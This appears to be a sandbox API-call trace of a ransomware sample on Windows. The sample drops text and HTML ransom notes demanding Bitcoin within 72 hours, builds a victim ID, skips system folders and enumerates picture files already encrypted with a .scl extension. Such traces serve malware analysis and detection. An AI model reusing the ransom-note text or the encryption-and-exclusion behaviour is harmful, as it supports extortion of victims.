	[0197.965] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI"
	[0197.965] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\*.*"
	[0197.965] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0197.965] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0197.965] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\HELP_DECRYPT_YOUR_FILES.TXT") returned 71
	[0197.966] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0197.966] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0197.966] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0197.969] CloseHandle (hObject=0x384) returned 1
	[0197.969] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0197.970] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.970] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0197.971] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0197.971] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0197.971] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0197.972] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0197.972] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0197.972] CloseHandle (hObject=0x384) returned 1
	[0197.972] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0197.972] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0197.973] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0197.973] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\HELP_DECRYPT_YOUR_FILES.HTML") returned 72
	[0197.973] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0197.975] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0197.975] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0197.978] CloseHandle (hObject=0x384) returned 1
	[0197.978] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0198.094] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0198.095] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0198.095] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0198.096] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0198.096] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0198.096] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0198.097] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0198.097] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0198.097] CloseHandle (hObject=0x384) returned 1
	[0198.097] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e9fdf40, ftCreationTime.dwHighDateTime=0x1d9758f, ftLastAccessTime.dwLowDateTime=0x8f8537c1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8f879892, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0198.098] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\*.*") returned 47
	[0198.098] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0198.098] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\*.*", cchLength=0x2f | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*") returned 0x2f
	[0198.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.098] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="windows") returned 0x0
	[0198.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.098] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="boot") returned 0x0
	[0198.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.099] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="system volume information") returned 0x0
	[0198.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.099] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0198.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.099] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="temp") returned 0x0
	[0198.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.100] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="program files") returned 0x0
	[0198.100] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.100] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="program files (x86)") returned 0x0
	[0198.100] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.100] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="appdata") returned 0x0
	[0198.100] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.100] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="application data") returned 0x0
	[0198.100] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.101] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="winnt") returned 0x0
	[0198.101] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.101] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="tmp") returned 0x0
	[0198.101] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.101] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="cache") returned 0x0
	[0198.101] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.102] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="temporary internet files") returned 0x0
	[0198.102] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.102] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="webcache") returned 0x0
	[0198.102] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.102] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="inetcache") returned 0x0
	[0198.102] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.102] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="nvidia") returned 0x0
	[0198.102] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.103] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="packages") returned 0x0
	[0198.103] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.103] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="cookies") returned 0x0
	[0198.103] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0198.103] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\*.*", lpSrch="programdata") returned 0x0
	[0198.103] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0198.105] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0198.105] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e9fdf40, ftCreationTime.dwHighDateTime=0x1d9758f, ftLastAccessTime.dwLowDateTime=0x8f8537c1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8f879892, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0198.105] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0198.105] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ec8db72, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ec8db72, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ecb3ef0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xcef0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bxtp1ubjz_.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="BXTP1U~1.SCL")) returned 1
	[0198.105] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ecda1dc, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ecda1dc, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ecda1dc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x6bd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dokctgdprst.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="DOKCTG~1.SCL")) returned 1
	[0198.105] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f879892, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8f879892, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8f9aaabd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0198.105] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f879892, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8f879892, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8f879892, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0198.105] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ed2686a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ed2686a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ed2686a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hg1hf_lrt.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="HG1HF_~1.SCL")) returned 1
	[0198.105] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f1c7ae4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8f1c7ae4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8f1edd67, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x11ae0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hg5hwqecsvicbr7x.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="HG5HWQ~1.SCL")) returned 1
	[0198.105] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f237855, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8f237855, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8f25da64, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x156b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hp_ehy49u8gtio_zgw.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="HP_EHY~1.SCL")) returned 1
	[0198.106] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2d0083, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8f2d0083, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8f2d0083, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x4050, dwReserved0=0x0, dwReserved1=0x0, cFileName="ifm43t.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="IFM43T~1.SCL")) returned 1
	[0198.106] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f31c40f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8f31c40f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8f342822, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x18ee0, dwReserved0=0x0, dwReserved1=0x0, cFileName="k6x1lbrqivx -.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="K6X1LB~1.SCL")) returned 1
	[0198.106] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f4274da, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8f4274da, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8f4274da, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x2510, dwReserved0=0x0, dwReserved1=0x0, cFileName="k959wnyk.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="K959WN~1.SCL")) returned 1
	[0198.106] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f5f10bd, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8f5f10bd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8f5f10bd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x6a60, dwReserved0=0x0, dwReserved1=0x0, cFileName="kxc0zn.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="KXC0ZN~1.SCL")) returned 1
	[0198.106] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f63d49e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8f63d49e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8f6d5f6f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xbf50, dwReserved0=0x0, dwReserved1=0x0, cFileName="pzzbpv p9-wmofgmv.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="PZZBPV~1.SCL")) returned 1
	[0198.106] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7486ec, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8f7486ec, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8f7486ec, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="quwg7c_8dv6tfar.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="QUWG7C~1.SCL")) returned 1
	[0198.106] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f82d362, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8f82d362, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8f8537c1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x12330, dwReserved0=0x0, dwReserved1=0x0, cFileName="wqwc5lrtjgp.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="WQWC5L~1.SCL")) returned 1
	[0198.106] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f82d362, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8f82d362, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8f8537c1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x12330, dwReserved0=0x0, dwReserved1=0x0, cFileName="wqwc5lrtjgp.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="WQWC5L~1.SCL")) returned 0
	[0198.106] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0198.106] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0198.107] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e055aa6, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e055aa6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e07bf82, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x124a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7aqvlowxb6rold9vria4.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="7AQVLO~1.SCL")) returned 1
	[0198.107] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e13a7ec, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8e13a7ec, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8e13a7ec, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x7610, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7n6b8ii7i7.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="7N6B8I~1.SCL")) returned 1
